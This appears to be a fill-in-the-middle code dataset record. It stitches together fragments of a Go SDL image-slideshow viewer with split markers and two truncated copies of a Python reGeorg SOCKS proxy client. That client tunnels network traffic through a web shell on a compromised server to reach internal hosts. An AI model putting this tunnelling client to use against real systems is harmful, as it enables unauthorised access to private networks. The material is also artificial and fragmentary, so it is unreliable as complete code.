fmt.Printf("Failed to create texture: %s\n", err)
}
}
}
func (win *winInfo) displayBar() {
message := "\uF04A \uF04B \uF04E \uF0E2 \uF01E"
surface, err := win.symbols.RenderUTF8Shaded(message, sdlColorWhite, sdlColorBlack)
if err == nil {
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Println(err)
}
surface.Free()
width := int32(len(message) * 18)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 120, Y: 500, W: width, H: 40})
texture.Destroy()
} else {
logger.Warning("OMG")
}
}
func resetImg(index int) {
if slide.list[index].texture != nil {
slide.list[index].texture.Destroy()
slide.list[index].texture = nil
}
}
func (win *winInfo) loadAndFreeAround() {
p1 := utils.Mod(slide.current-1, len(slide.list))
p2 := utils.Mod(slide.current-1, len(slide.list))
n1 := utils.Mod(slide.current+1, len(slide.list))
n2 := utils.Mod(slide.current+2, len(slide.list))
n3 := utils.Mod(slide.current+3, len(slide.list))
refresh := utils.IntList{p1, p2, n1, n2, n3}
// preload the previous and next two images
for _, idx := range refresh {
loadImg(win, idx)
}
d1 := utils.Mod(slide.current-3, len(slide.list))
d2 := utils.Mod(slide.current+3, len(slide.list))
if !refresh.Find(d1) {
resetImg(d1)
}
if !refresh.Find(d2) {
resetImg(d2)
}
}
func (win *winInfo) loadCurrentImage(render bool) {
var src, dst sdl.Rect
// load and display the current image
loadImg(win, slide.current)
// Display information of the image
ww, wh := win.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
iw, ih := utils.ComputeFitImage(uint32(ww), uint32(wh), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(ww/2 - int32(iw)/2), Y: int32(wh/2 - int32(ih)/2), W: int32(iw), H: int32(ih)}
if render {
win.renderer.Clear()
win.renderer.Copy(curImg().texture, &src, &dst)
if window.displayInfo {
window.displayPictureInfo()
}
//window.displayBar()
win.renderer.Present()
}
// Update the window title
win.setTitle(slide.current+1, len(slide.list), curImg().path)
// Preload and free images from the list
win.loadAndFreeAround()
}
// Arrange that main.main runs on main thread.
func init() |
var window winInfo
// MainLoop initializes the SDL package and run the main loop
func MainLoop(fullScreen bool, slideshow bool) int {
var event sdl.Event
var src, dst sdl.Rect
var err error
var flags uint32 = sdl.WINDOW_SHOWN | sdl.WINDOW_RESIZABLE | sdl.WINDOW_ALLOW_HIGHDPI
// Load the font library
if err := ttf.Init(); err != nil {
logger.Warning("Unable to open font lib")
}
window.window, err = sdl.CreateWindow(winTitle, sdl.WINDOWPOS_UNDEFINED, sdl.WINDOWPOS_UNDEFINED, winDefaultHeight, winDefaultWidth, flags)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create window: %s\n", err)
return 1
}
defer window.window.Destroy()
// Load resources
if f, err := filepath.Abs(filepath.Dir(os.Args[0])); err == nil {
icon := filepath.Join(f, "app", "icon.bmp")
if i, err := sdl.LoadBMP(icon); err == nil {
window.window.SetIcon(i)
}
font := filepath.Join(f, "app", "fonts", "opensans.ttf")
window.font, err = ttf.OpenFont(font, 14)
if err != nil {
logger.Warning("Unable to load " + font)
}
window.font.SetKerning(false)
font = filepath.Join(f, "app", "fonts", "fontawesome.ttf")
window.symbols, err = ttf.OpenFont(font, 64)
if err != nil {
logger.Warning("Unable to load " + font)
}
}
window.renderer, err = sdl.CreateRenderer(window.window, -1, sdl.RENDERER_ACCELERATED)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create renderer: %s\n", err)
return 2
}
defer window.renderer.Destroy()
window.displayInfo = false
window.displayLoading()
window.setTitle(slide.current+1, len(slide.list), curImg().path)
window.loadCurrentImage(false)
// Declare if the image needs to be updated
var update = false
var running = true
for running {
event = sdl.WaitEvent()
switch t := event.(type) {
case *sdl.QuitEvent:
running = false
case *sdl.DropEvent:
fileName := t.File
// Check if picture already in list
found := false
for i := range slide.list {
if slide.list[i].path == fileName {
found = true
slide.current = i
update = true
break
}
}
if !found {
if err := addPic(fileName); err != nil {
sdl.ShowSimpleMessageBox(sdl.MESSAGEBOX_INFORMATION, "File dropped on window", "Cannot add "+fileName, window.window)
} else {
slide.current = len(slide.list) - 1
update = true
}
}
/*case *sdl.MouseMotionEvent:
fmt.Printf("[%d ms] MouseMotion\ttype:%d\tid:%d\tx:%d\ty:%d\txrel:%d\tyrel:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.XRel, t.YRel)
case *sdl.MouseButtonEvent:
fmt.Printf("[%d ms] MouseButton\ttype:%d\tid:%d\tx:%d\ty:%d\tbutton:%d\tstate:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.Button, t.State)*/
case *sdl.WindowEvent:
if t.Event == sdl.WINDOWEVENT_RESIZED || t.Event == sdl.WINDOWEVENT_EXPOSED {
window.window.SetSize(t.Data1, t.Data2)
// Display information of the image
wWidth, wHeight := window.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
fitWidth, fitHeight := utils.ComputeFitImage(uint32(wWidth), uint32(wHeight), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(wWidth/2 - int32(fitWidth)/2), Y: int32(wHeight/2 - int32(fitHeight)/2), W: int32(fitWidth), H: int32(fitHeight)}
window.renderer.Clear()
window.renderer.Copy(curImg().texture, &src, &dst)
window.renderer.Present()
if window.displayInfo {
window.displayPictureInfo()
window.renderer.Present()
}
}
case *sdl.KeyboardEvent:
if t.GetType() != sdl.KEYDOWN {
break
}
// Get next or previous image
if t.Repeat == 0 {
if t.Keysym.Sym == sdl.K_LEFT {
slide.current = utils.Mod((slide.current - 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_RIGHT {
slide.current = utils.Mod((slide.current + 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_PAGEUP {
if err := picture.RotateImage(curImg().path, picture.CounterClockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == sdl.K_PAGEDOWN {
if err := picture.RotateImage(curImg().path, picture.Clockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == 102 { // F
if window.fullscreen {
window.window.SetFullscreen(0)
} else {
// Go fullscreen
window.window.SetFullscreen(sdl.WINDOW_FULLSCREEN_DESKTOP)
}
window.fullscreen = !window.fullscreen
} else if t.Keysym.Sym == 105 { // I
window.displayInfo = !window.displayInfo
if window.displayInfo {
fmt.Println("Toggle info: on")
window.displayPictureInfo()
window.renderer.Present()
} else {
fmt.Println("Toggle info: off")
update = true
}
} else if t.Keysym.Sym == sdl.K_ESCAPE {
if window.fullscreen {
window.window.SetFullscreen(0)
window.fullscreen = false
}
} else {
fmt.Printf("%d\n", t.Keysym.Sym)
}
}
}
if update {
window.loadCurrentImage(true)
update = false
}
}
return 0
}
| {
runtime.LockOSThread()
// Video only
if err := sdl.Init(sdl.INIT_VIDEO); err != nil {
logger.Warning(err.Error())
}
} | identifier_body |
display.go | package core
//#include <stdlib.h>
import "C"
import (
"fmt"
"os"
"path/filepath"
"runtime"
"strconv"
"github.com/n0dev/go-slideshow/core/picture"
"github.com/n0dev/go-slideshow/core/picture/exif"
"github.com/n0dev/go-slideshow/logger"
"github.com/n0dev/go-slideshow/utils"
"github.com/veandco/go-sdl2/img"
"github.com/veandco/go-sdl2/sdl"
"github.com/veandco/go-sdl2/ttf"
)
const (
winTitle = "GoSlideshow"
winDefaultWidth = 600
winDefaultHeight = 800
)
var (
sdlColorWhite = sdl.Color{A: 0, B: 0, G: 0, R: 0}
sdlColorBlack = sdl.Color{A: 0, B: 255, G: 255, R: 255}
)
// Information about the display window
type winInfo struct {
window *sdl.Window
renderer *sdl.Renderer
font *ttf.Font
symbols *ttf.Font
fullscreen bool
displayInfo bool
}
type imgInfo struct {
path string
H int32
W int32
texture *sdl.Texture
}
// Change the title according to the inputs
func (win *winInfo) setTitle(position int, total int, path string) {
win.window.SetTitle(winTitle + " - " + strconv.Itoa(position) + "/" + strconv.Itoa(total) + " - " + filepath.Base(path))
}
// Create the texture from text using TTF
func (win *winInfo) renderText(text string) (*sdl.Texture, error) {
surface, err := win.font.RenderUTF8Shaded(text, sdlColorBlack, sdlColorWhite)
defer surface.Free()
if err != nil {
return nil, err
}
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
return nil, err
}
return texture, nil
}
// displayLoading display loading on background
func (win *winInfo) displayLoading() {
texture, _ := win.renderText("Loading...")
ww, wh := win.window.GetSize()
win.renderer.Copy(texture, nil, &sdl.Rect{X: int32(ww/2 - 50), Y: int32(wh/2 - 1), W: 65, H: 20})
texture.Destroy()
win.renderer.Present()
}
// displayPictureInfo display all information about the picture
func (win *winInfo) displayPictureInfo() {
/* Display exif information */
go func(path string) {
exif.Open(path)
}(curImg().path)
msg := filepath.Base(curImg().path)
texture, _ := win.renderText(msg)
width := int32(len(msg) * 8)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 2, Y: 2, W: width, H: 20})
texture.Destroy()
}
func loadImg(win *winInfo, index int) {
if slide.list[index].texture == nil {
var err error
var surface *sdl.Surface
logger.Trace("load " + slide.list[index].path)
surface, err = img.Load(slide.list[index].path)
if err != nil {
fmt.Printf("Failed to load: %s\n", err)
}
defer surface.Free()
slide.list[index].H = surface.H
slide.list[index].W = surface.W
slide.list[index].texture, err = win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Printf("Failed to create texture: %s\n", err)
}
}
}
func (win *winInfo) displayBar() {
message := "\uF04A \uF04B \uF04E \uF0E2 \uF01E"
surface, err := win.symbols.RenderUTF8Shaded(message, sdlColorWhite, sdlColorBlack)
if err == nil {
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Println(err)
}
surface.Free()
width := int32(len(message) * 18)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 120, Y: 500, W: width, H: 40})
texture.Destroy()
} else {
logger.Warning("OMG")
}
}
func resetImg(index int) {
if slide.list[index].texture != nil {
slide.list[index].texture.Destroy()
slide.list[index].texture = nil
}
}
func (win *winInfo) loadAndFreeAround() {
p1 := utils.Mod(slide.current-1, len(slide.list))
p2 := utils.Mod(slide.current-1, len(slide.list))
n1 := utils.Mod(slide.current+1, len(slide.list))
n2 := utils.Mod(slide.current+2, len(slide.list))
n3 := utils.Mod(slide.current+3, len(slide.list))
refresh := utils.IntList{p1, p2, n1, n2, n3}
// preload the previous and next two images
for _, idx := range refresh {
loadImg(win, idx)
}
d1 := utils.Mod(slide.current-3, len(slide.list))
d2 := utils.Mod(slide.current+3, len(slide.list))
if !refresh.Find(d1) {
resetImg(d1)
}
if !refresh.Find(d2) {
resetImg(d2)
}
}
func (win *winInfo) loadCurrentImage(render bool) {
var src, dst sdl.Rect
// load and display the current image
loadImg(win, slide.current)
// Display information of the image
ww, wh := win.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
iw, ih := utils.ComputeFitImage(uint32(ww), uint32(wh), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(ww/2 - int32(iw)/2), Y: int32(wh/2 - int32(ih)/2), W: int32(iw), H: int32(ih)}
if render {
win.renderer.Clear()
win.renderer.Copy(curImg().texture, &src, &dst)
if window.displayInfo {
window.displayPictureInfo()
}
//window.displayBar()
win.renderer.Present()
}
// Update the window title
win.setTitle(slide.current+1, len(slide.list), curImg().path)
// Preload and free images from the list
win.loadAndFreeAround()
}
// Arrange that main.main runs on main thread.
func init() {
runtime.LockOSThread()
// Video only
if err := sdl.Init(sdl.INIT_VIDEO); err != nil {
logger.Warning(err.Error())
}
}
var window winInfo
// MainLoop initializes the SDL package and run the main loop
func MainLoop(fullScreen bool, slideshow bool) int {
var event sdl.Event
var src, dst sdl.Rect
var err error
var flags uint32 = sdl.WINDOW_SHOWN | sdl.WINDOW_RESIZABLE | sdl.WINDOW_ALLOW_HIGHDPI
// Load the font library
if err := ttf.Init(); err != nil {
logger.Warning("Unable to open font lib")
}
window.window, err = sdl.CreateWindow(winTitle, sdl.WINDOWPOS_UNDEFINED, sdl.WINDOWPOS_UNDEFINED, winDefaultHeight, winDefaultWidth, flags)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create window: %s\n", err)
return 1
}
defer window.window.Destroy()
// Load resources
if f, err := filepath.Abs(filepath.Dir(os.Args[0])); err == nil {
icon := filepath.Join(f, "app", "icon.bmp")
if i, err := sdl.LoadBMP(icon); err == nil {
window.window.SetIcon(i)
}
font := filepath.Join(f, "app", "fonts", "opensans.ttf")
window.font, err = ttf.OpenFont(font, 14)
if err != nil {
logger.Warning("Unable to load " + font)
}
window.font.SetKerning(false)
font = filepath.Join(f, "app", "fonts", "fontawesome.ttf")
window.symbols, err = ttf.OpenFont(font, 64)
if err != nil {
logger.Warning("Unable to load " + font)
}
}
window.renderer, err = sdl.CreateRenderer(window.window, -1, sdl.RENDERER_ACCELERATED)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create renderer: %s\n", err)
return 2
}
defer window.renderer.Destroy()
window.displayInfo = false
window.displayLoading()
window.setTitle(slide.current+1, len(slide.list), curImg().path)
window.loadCurrentImage(false)
// Declare if the image needs to be updated
var update = false
var running = true
for running {
event = sdl.WaitEvent()
switch t := event.(type) {
case *sdl.QuitEvent:
running = false
case *sdl.DropEvent:
fileName := t.File
// Check if picture already in list
found := false
for i := range slide.list {
if slide.list[i].path == fileName {
found = true
slide.current = i
update = true
break
}
}
if !found {
if err := addPic(fileName); err != nil {
sdl.ShowSimpleMessageBox(sdl.MESSAGEBOX_INFORMATION, "File dropped on window", "Cannot add "+fileName, window.window)
} else {
slide.current = len(slide.list) - 1
update = true
}
}
/*case *sdl.MouseMotionEvent:
fmt.Printf("[%d ms] MouseMotion\ttype:%d\tid:%d\tx:%d\ty:%d\txrel:%d\tyrel:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.XRel, t.YRel)
case *sdl.MouseButtonEvent:
fmt.Printf("[%d ms] MouseButton\ttype:%d\tid:%d\tx:%d\ty:%d\tbutton:%d\tstate:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.Button, t.State)*/
case *sdl.WindowEvent:
if t.Event == sdl.WINDOWEVENT_RESIZED || t.Event == sdl.WINDOWEVENT_EXPOSED {
window.window.SetSize(t.Data1, t.Data2)
// Display information of the image
wWidth, wHeight := window.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
fitWidth, fitHeight := utils.ComputeFitImage(uint32(wWidth), uint32(wHeight), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(wWidth/2 - int32(fitWidth)/2), Y: int32(wHeight/2 - int32(fitHeight)/2), W: int32(fitWidth), H: int32(fitHeight)}
window.renderer.Clear()
window.renderer.Copy(curImg().texture, &src, &dst)
window.renderer.Present()
if window.displayInfo {
window.displayPictureInfo()
window.renderer.Present()
}
}
case *sdl.KeyboardEvent:
if t.GetType() != sdl.KEYDOWN {
break
}
// Get next or previous image
if t.Repeat == 0 {
if t.Keysym.Sym == sdl.K_LEFT {
slide.current = utils.Mod((slide.current - 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_RIGHT {
slide.current = utils.Mod((slide.current + 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_PAGEUP {
if err := picture.RotateImage(curImg().path, picture.CounterClockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == sdl.K_PAGEDOWN {
if err := picture.RotateImage(curImg().path, picture.Clockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == 102 { // F
if window.fullscreen {
window.window.SetFullscreen(0)
} else {
// Go fullscreen
window.window.SetFullscreen(sdl.WINDOW_FULLSCREEN_DESKTOP)
}
window.fullscreen = !window.fullscreen
} else if t.Keysym.Sym == 105 { // I
window.displayInfo = !window.displayInfo
if window.displayInfo {
fmt.Println("Toggle info: on")
window.displayPictureInfo()
window.renderer.Present()
} else {
fmt.Println("Toggle info: off")
update = true
}
} else if t.Keysym.Sym == sdl.K_ESCAPE {
if window.fullscreen |
} else {
fmt.Printf("%d\n", t.Keysym.Sym)
}
}
}
if update {
window.loadCurrentImage(true)
update = false
}
}
return 0
}
| {
window.window.SetFullscreen(0)
window.fullscreen = false
} | conditional_block |
w_reGeorgSocksProxy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from traceback import format_exc
import time
import argparse
from urlparse import urlparse
from socket import *
from threading import Thread
import requests
from handle_log import logger
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT = 300
VER = "\x05"
METHOD = "\x00"
SUCCESS = "\x00"
SOCKFAIL = "\x01"
NETWORKFAIL = "\x02"
HOSTFAIL = "\x04"
REFUSED = "\x05"
TTLEXPIRED = "\x06"
UNSUPPORTCMD = "\x07"
ADDRTYPEUNSPPORT = "\x08"
UNASSIGNED = "\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
HEADER = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
TIMEOUT = (5, 5)
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self, pSocket, connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
else:
if not o.port:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
def parseSocks5(self, sock):
logger.debug("SocksVersion5 detected")
# 02:00
nmethods, methods = (sock.recv(1), sock.recv(1))
# 05:00
sock.sendall(VER + METHOD)
# :02
ver = sock.recv(1)
if ver == "\x02": # this is a hack for proxychains
# 05:01:00:01----:c0:a8:01:02:00:50
# '\x05', '\x01', '\x00', '\x01'
ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1))
else:
cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1))
target = None
targetPort = None
if atyp == "\x01": # IPv4
# Reading 6 bytes for the IP and Port
# c0:a8:01:02
target = sock.recv(4)
# 00:50
targetPort = sock.recv(2)
# 目标地址192.168.2.1
self.target = ".".join([str(ord(i)) for i in target])
elif atyp == "\x03": # Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp == "\x04": # IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr = []
for i in xrange(len(target) / 2):
tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1])))
target = ":".join(tmp_addr)
# 80
self.targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1])
if cmd == "\x02": # BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd == "\x03": # UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd == "\x01": # CONNECT
serverIp = target
try:
serverIp = gethostbyname(self.target)
except:
logger.error("oeps")
# 又转回来\xc0\xa8\x02\x01
serverIp = "".join([chr(int(i)) for i in serverIp.split(".")])
# 获取cookie,在服务端的脚本中,会执行相应端口探测
self.cookie = self.setupRemoteSession(target=self.target, targetPort=str(self.targetPort))
if self.cookie:
sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return True
else:
sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return False
def handleSocks(self, sock):
# 通过proxychain模拟客户端发送数据,第一个字节可以判断是socks5还是socks4
ver = sock.recv(1)
# 05:02:00:02
if ver == "\x05":
return self.parseSocks5(sock)
def setupRemoteSession(self, target, targetPort):
"""探测端口存活"""
header = ({"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": targetPort})
cookie = None
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
return
else:
if response:
response_header = response.headers
if response.status_code == 200 and response_header.get("X-STATUS") == "OK":
cookie = response_header.get("Set-Cookie")
logger.info("[%s:%s] HTTP [200]: cookie [%s]" % (target, targetPort, cookie))
elif response_header.get("X-ERROR"):
logger.error(response_header.get("X-ERROR"))
else:
logger.error("[%s:%s] HTTP [%d]" % (target, targetPort, response.status_code))
return cookie
def closeRemoteSession(self):
header = {"X-CMD": "DISCONNECT", "Cookie": self.cookie}
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
logger.error("Close Connection Failure")
else:
if response.status_code == 200:
logger.info("[%s:%d] Connection Terminated" % (self.httpHost, self.httpPort))
def reader(self):
while True:
try:
if not self.pSocket:
break
header = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = requests.post(url=self.connectString, headers=header, data=None)
response_data = None
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
response_data = response.content
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("X-ERROR")))
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
if response_data is None:
# Remote socket closed
break
if len(response_data) == 0:
time.sleep(0.1)
continue
self.pSocket.send(response_data)
except Exception, ex:
print(format_exc())
raise ex
self.closeRemoteSession()
logger.debug("[%s:%d] Closing localsocket" % (self.target, self.targetPort))
try:
self.pSocket.close()
except:
logger.debug("[%s:%d] Localsocket already closed" % (self.target, self.targetPort))
def writer(self):
global READBUFSIZE
while True:
try:
self.pSocket.settimeou | # 'GET / HTTP/1.1\r\nHost: 192.168.2.1\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n'
data = self.pSocket.recv(READBUFSIZE)
if not data:
break
header = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream",
"Connection": "Keep-Alive"}
# 携带数据
response = requests.post(url=self.connectString, headers=header, data=data)
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
if response_header.get("set-cookie") is not None:
self.cookie = response_header.get("set-cookie")
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("x-error")))
break
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
break
# transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data)))
except timeout:
continue
except Exception, ex:
raise ex
self.closeRemoteSession()
logger.debug("Closing localsocket")
try:
self.pSocket.close()
except:
logger.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
r = Thread(target=self.reader, args=())
r.start()
w = Thread(target=self.writer, args=())
w.start()
w.join()
r.join()
except Exception, e:
# 报错关闭连接
logger.error(format_exc())
self.closeRemoteSession()
self.pSocket.close()
def askgeorg(url):
"""检测reg连接方法"""
try:
response = requests.get(url=url, headers=HEADER, timeout=TIMEOUT)
except Exception, e:
return False
else:
if response:
text = response.text.strip()
if response.status_code == 200 and text == "Georg says, 'All seems fine'":
logger.info(text)
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1")
parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888")
parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST",
type=int, default="1024")
parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script")
# 取消了原通过命令行指定log级别,通过配置文件指定
# parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO")
args = parser.parse_args()
logger.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url))
logger.info("Checking if Georg is ready")
# 查看shell连通性
if not askgeorg(url=args.url):
logger.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
# 创建socket
servSock = socket(AF_INET, SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 127.0.0.1:8889,ubuntu中proxychains监听8889端口
servSock.bind((args.listen_on, args.listen_port))
servSock.listen(1000)
while True:
try:
sock, addr_info = servSock.accept()
sock.settimeout(SOCKTIMEOUT)
logger.debug("Incomming connection")
# 发起传输数据请求
session(sock, args.url).start()
except KeyboardInterrupt, ex:
break
except Exception, e:
logger.error(e)
servSock.close()
| t(1)
| identifier_name |
w_reGeorgSocksProxy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from traceback import format_exc
import time
import argparse
from urlparse import urlparse
from socket import *
from threading import Thread
import requests
from handle_log import logger
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT = 300
VER = "\x05"
METHOD = "\x00"
SUCCESS = "\x00"
SOCKFAIL = "\x01"
NETWORKFAIL = "\x02"
HOSTFAIL = "\x04"
REFUSED = "\x05"
TTLEXPIRED = "\x06"
UNSUPPORTCMD = "\x07"
ADDRTYPEUNSPPORT = "\x08"
UNASSIGNED = "\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
HEADER = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
TIMEOUT = (5, 5)
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self, pSocket, connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
else:
if not o.port:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
def parseSocks5(self, sock):
logger.debug("SocksVersion5 detected")
# 02:00
nmethods, methods = (sock.recv(1), sock.recv(1))
# 05:00
sock.sendall(VER + METHOD)
# :02
ver = sock.recv(1)
if ver == "\x02": # this is a hack for proxychains
# 05:01:00:01----:c0:a8:01:02:00:50
# '\x05', '\x01', '\x00', '\x01'
ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1))
else:
cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1))
target = None
targetPort = None
if atyp == "\x01": # IPv4
# Reading 6 bytes for the IP and Port
# c0:a8:01:02
target = sock.recv(4)
# 00:50
targetPort = sock.recv(2)
# 目标地址192.168.2.1
self.target = ".".join([str(ord(i)) for i in target])
elif atyp == "\x03": # Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp == "\x04": # IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr = []
for i in xrange(len(target) / 2):
tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1])))
target = ":".join(tmp_addr)
# 80
self.targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1])
if cmd == "\x02": # BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd == "\x03": # UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd == "\x01": # CONNECT
serverIp = target
try:
serverIp = gethostbyname(self.target)
except:
logger.error("oeps")
# 又转回来\xc0\xa8\x02\x01
serverIp = "".join([chr(int(i)) for i in serverIp.split(".")])
# 获取cookie,在服务端的脚本中,会执行相应端口探测
self.cookie = self.setupRemoteSession(target=self.target, targetPort=str(self.targetPort))
if self.cookie:
sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return True
else:
sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return False
def handleSocks(self, sock):
# 通过proxychain模拟客户端发送数据,第一个字节可以判断是socks5还是socks4
ver = sock.recv(1)
# 05:02:00:02
if ver == "\x05":
return self.parseSocks5(sock)
def setupRemoteSession(self, target, targetPort):
"""探测端口存活"""
header = ({"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": targetPort})
cookie = None
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
return
else:
if response: | elif response_header.get("X-ERROR"):
logger.error(response_header.get("X-ERROR"))
else:
logger.error("[%s:%s] HTTP [%d]" % (target, targetPort, response.status_code))
return cookie
def closeRemoteSession(self):
header = {"X-CMD": "DISCONNECT", "Cookie": self.cookie}
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
logger.error("Close Connection Failure")
else:
if response.status_code == 200:
logger.info("[%s:%d] Connection Terminated" % (self.httpHost, self.httpPort))
def reader(self):
while True:
try:
if not self.pSocket:
break
header = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
